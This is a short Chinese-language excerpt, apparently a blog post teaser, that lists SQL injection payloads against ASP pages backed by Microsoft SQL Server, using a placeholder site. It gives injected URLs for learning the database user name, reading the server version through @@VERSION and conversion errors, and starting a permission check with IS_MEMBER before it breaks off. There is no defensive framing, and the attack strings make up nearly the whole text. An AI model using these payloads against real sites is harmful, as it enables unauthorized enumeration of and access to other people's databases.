摘要： 库名检测:http://www.xxx.com/asp?=xx' and user>0-- //“--”是注视,判断库名.SQL系统版本检测:http://www.xxx.com/asp?=xx' and1=(select@@VERSION)--　//Microsoft SQL Server版本　http://www.xxx.com/asp?=xx' and1=convert(int,@@version)-- //Microsoft SQL Server版本数据库权限判断:http://www.xxx.com/asp?=xx and 1=(Select IS_ME 阅读全文